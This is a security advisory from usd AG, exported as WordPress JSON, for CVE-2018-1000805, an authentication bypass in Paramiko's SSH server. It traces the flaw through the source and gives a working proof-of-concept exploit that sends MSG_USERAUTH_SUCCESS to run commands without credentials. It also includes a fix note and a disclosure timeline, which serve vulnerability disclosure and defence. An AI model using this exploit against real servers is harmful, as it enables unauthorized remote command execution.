{"id":16567,"date":"2021-07-08T09:40:30","date_gmt":"2021-07-08T07:40:30","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2018-0023\/"},"modified":"2021-07-19T14:08:50","modified_gmt":"2021-07-19T12:08:50","slug":"usd-2018-0023","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2018-0023\/","title":{"rendered":"usd-2018-0023"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

usd-2018-0023 | Paramiko\/2.4.1, 2.3.2, 2.2.3, 2.1.5, 2.0.8, 1.18.5, 1.17.6<\/span><\/h1>\n

<\/span>
Advisory ID<\/strong>: 2018-0023<\/span>
CVE number<\/strong>: CVE-2018-1000805<\/span>
Affected Product<\/strong>: Paramiko<\/span>
Affected Version<\/strong>: 2.4.1, 2.3.2, 2.2.3, 2.1.5, 2.0.8, 1.18.5, 1.17.6<\/span>
Vulnerability Type<\/strong>: Authentication Bypass<\/span>
Security Risk<\/strong>: Critical<\/span>
Vendor URL<\/strong>: <\/span>https:\/\/www.paramiko.org\/<\/a>
Vendor Status<\/strong>: Fixed according to vendor in version 2.0.x and up<\/span><\/p>\n

<\/h3>\n

Description<\/h3>\n

The authentication process within the Paramiko SSH server can by bypassed by sending a MSG_USERAUTH_SUCCESS message to the server. An attacker who exploits this vulnerability can gain remote code execution.<\/p>\n

Description based on most recent commit
https:\/\/github.com\/paramiko\/paramiko\/tree\/677166b4411e86029226f3d093701fb3b999a082<\/p>\n

The server identifies each message by an ID (`ptype`). If the ID exists in the transport._handler_table, the server checks if the connection is authenticated (transport.py:2003)<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]if ptype in self._handler_table:
\nerror_msg = self._ensure_authed(ptype, m)
\nif error_msg:
\nself._send_message(error_msg)
\nelse:
\nself._handler_table[ptype](self, m)<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

The function `self._ensure_authed` returns `None` if the user is authenticated (transport.py:1716)<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]if (
\nnot self.server_mode or
\nptype &lt;= HIGHEST_USERAUTH_MESSAGE_ID or
\nself.is_authenticated()
\n):
\nreturn None<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n

If the ID does not exist in the transport._handler_table, the auth_handler._handler_table is checked and the corresponding method is called (transport.py:2029)<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" custom_margin=\"||27px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"]elif (
\nself.auth_handler is not None
\nand ptype in self.auth_handler._handler_table
\n):
\nhandler = self.auth_handler._handler_table[ptype]
\nhandler(self.auth_handler, m)
\nif len(self._expected_packet) &gt; 0:
\ncontinue<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"_initial\" custom_margin=\"||27px||false|false\"]<\/p>\n

By default, the auth_handler adds MSG_USERAUTH_SUCCESS to the _handler_table (auth_handler.py:606)<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" custom_margin=\"||27px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"]_handler_table = {
\nMSG_SERVICE_REQUEST: _parse_service_request,
\nMSG_SERVICE_ACCEPT: _parse_service_accept,
\nMSG_USERAUTH_REQUEST: _parse_userauth_request,
\nMSG_USERAUTH_SUCCESS: _parse_userauth_success,
\nMSG_USERAUTH_FAILURE: _parse_userauth_failure,
\nMSG_USERAUTH_BANNER: _parse_userauth_banner,
\nMSG_USERAUTH_INFO_REQUEST: _parse_userauth_info_request,
\nMSG_USERAUTH_INFO_RESPONSE: _parse_userauth_info_response,
\n}<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\"]<\/p>\n

\n

The function _parse_userauth_success sets the authenticated flag to true (auth_handler.py:541)<\/p>\n<\/div>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]def _parse_userauth_success(self, m):
\nself.transport._log(INFO, 'Authentication (%s) successful!' % self.auth_method)
\nself.authenticated = True
\nself.transport._auth_trigger()
\nif self.auth_event is not None:
\nself.auth_event.set()<\/code><\/pre>\n<\/div>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

By sending a MSG_USERAUTH_SUCCESS message to the server, it\u2019s possible to bypass the auth process.<\/p>\n

<\/span><\/h2>\n

<\/span><\/h2>\n

Proof of Concept<\/span><\/h2>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]### Example of a Paramiko SSH Server ###<\/p>\n

#!\/usr\/bin\/env python<\/p>\n

import base64
\nfrom binascii import hexlify
\nimport os
\nimport socket
\nimport sys
\nimport threading
\nimport traceback<\/p>\n

import paramiko
\nfrom paramiko.py3compat import b, u, decodebytes<\/p>\n

# setup logging
\nparamiko.util.log_to_file(\"demo_server.log\")<\/p>\n

host_key = paramiko.RSAKey(filename=\"test_rsa.key\")<\/p>\n

class Server(paramiko.ServerInterface):
\ndata = (
\nb\"AAAAB3NzaC1yc2EAAAABIwAAAIEAyO4it3fHlmGZWJaGrfeHOVY7RWO3P9M7hp\"
\nb\"fAu7jJ2d7eothvfeuoRFtJwhUmZDluRdFyhFY\/hFAh76PJKGAusIqIQKlkJxMC\"
\nb\"KDqIexkgHAfID\/6mqvmnSJf0b5W8v5h2pI\/stOSwTQ+pxVhwJ9ctYDhRSlF0iT\"
\nb\"UWT10hcuO4Ks8=\"
\n)
\ngood_pub_key = paramiko.RSAKey(data=decodebytes(data))<\/p>\n

def __init__(self):
\nself.event = threading.Event()<\/p>\n

def check_channel_request(self, kind, chanid):
\nif kind == \"session\":
\nreturn paramiko.OPEN_SUCCEEDED
\nreturn paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED<\/p>\n

def check_auth_password(self, username, password):
\nif (username == \"robey\") and (password == \"foo\"):
\nreturn paramiko.AUTH_SUCCESSFUL
\nreturn paramiko.AUTH_FAILED<\/p>\n

def check_auth_publickey(self, username, key):
\nprint(\"Auth attempt with key: \" + u(hexlify(key.get_fingerprint())))
\nif (username == \"robey\") and (key == self.good_pub_key):
\nreturn paramiko.AUTH_SUCCESSFUL
\nreturn paramiko.AUTH_FAILED<\/p>\n

def get_allowed_auths(self, username):
\nreturn \"password,publickey\"<\/p>\n

def check_channel_exec_request(self, channel, command):
\nprint(\"---SHOULD ONLY BE CALLABLE IF CLIENT IS AUTHED---\")
\nself.event.set()
\nreturn True<\/p>\n

try:
\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
\nsock.bind((\"\", 2200))
\nexcept Exception as e:
\nprint(\"*** Bind failed: \" + str(e))
\ntraceback.print_exc()
\nsys.exit(1)<\/p>\n

try:
\nsock.listen(100)
\nprint(\"Listening for connection ...\")
\nclient, addr = sock.accept()
\nexcept Exception as e:
\nprint(\"*** Listen\/accept failed: \" + str(e))
\ntraceback.print_exc()
\nsys.exit(1)<\/p>\n

print(\"Got a connection!\")<\/p>\n

try:
\nt = paramiko.Transport(client)
\nt.add_server_key(host_key)
\nserver = Server()
\ntry:
\nt.start_server(server=server)
\nexcept paramiko.SSHException:
\nprint(\"*** SSH negotiation failed.\")
\nsys.exit(1)<\/p>\n

# wait for auth
\nchan = t.accept(20)
\nif chan is None:
\nprint(\"*** No channel.\")
\nsys.exit(1)
\nprint(\"Authenticated!\")<\/p>\n

server.event.wait(10)<\/p>\n

chan.close()<\/p>\n

except Exception as e:
\nprint(\"*** Caught exception: \" + str(e.__class__) + \": \" + str(e))
\ntraceback.print_exc()
\ntry:
\nt.close()
\nexcept:
\npass
\nsys.exit(1)<\/p>\n

### Exploit ###<\/p>\n

from paramiko.common import cMSG_USERAUTH_SUCCESS, cMSG_USERAUTH_INFO_RESPONSE<\/p>\n

import paramiko<\/p>\n

port = 2200
\nhostname = '127.0.0.1'
\nusername = ''
\npassword = ''<\/p>\n

client = paramiko.SSHClient()<\/p>\n

#enable warning policy to allow connections to all servers
\nclient.set_missing_host_key_policy(paramiko.WarningPolicy())<\/p>\n

#overwrite auth method to skip the auth process
\nclient._auth = lambda *args, **kwargs: None
\nclient.connect(hostname, port, username, password)<\/p>\n

#craft MSG_USERAUTH_SUCCESS message
\nm = paramiko.Message()
\nm.add_byte(cMSG_USERAUTH_SUCCESS)
\nclient._transport._send_message(m)
\nclient.exec_command('yes')
\nclient.close()<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

\n
\n

Fix<\/h3>\n

Probably the message USERAUTH_SUCCESS is client specific and the callback should not be added to the auth_handler._handler_table in server mode.<\/span><\/p>\n

<\/h3>\n

Timeline<\/h3>\n
    \n
  • 2018-08-31 notified jeff@bitprophet.org<\/li>\n
  • 2018-09-20 issue has been fixed according to https:\/\/github.com\/paramiko\/paramiko\/issues\/1283 and patch will be released in 2.0.x and up<\/li>\n
  • 2018-11-19 Security advisory released<\/li>\n<\/ul>\n

    <\/h3>\n

    Credits<\/h3>\n

    This security vulnerability was found by Daniel Hoffmann of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n

    [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"

    usd-2018-0023 | Paramiko\/2.4.1, 2.3.2, 2.2.3, 2.1.5, 2.0.8, 1.18.5, 1.17.6 Advisory ID: 2018-0023CVE number: CVE-2018-1000805Affected Product: ParamikoAffected Version: 2.4.1, 2.3.2, 2.2.3, 2.1.5, 2.0.8, 1.18.5, 1.17.6Vulnerability Type: Authentication BypassSecurity Risk: CriticalVendor URL: https:\/\/www.paramiko.org\/Vendor Status: Fixed according to vendor in version 2.0.x and up Description The authentication process within the Paramiko SSH server can by bypassed by sending […]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16567","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16567","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16567"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16567\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16567"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}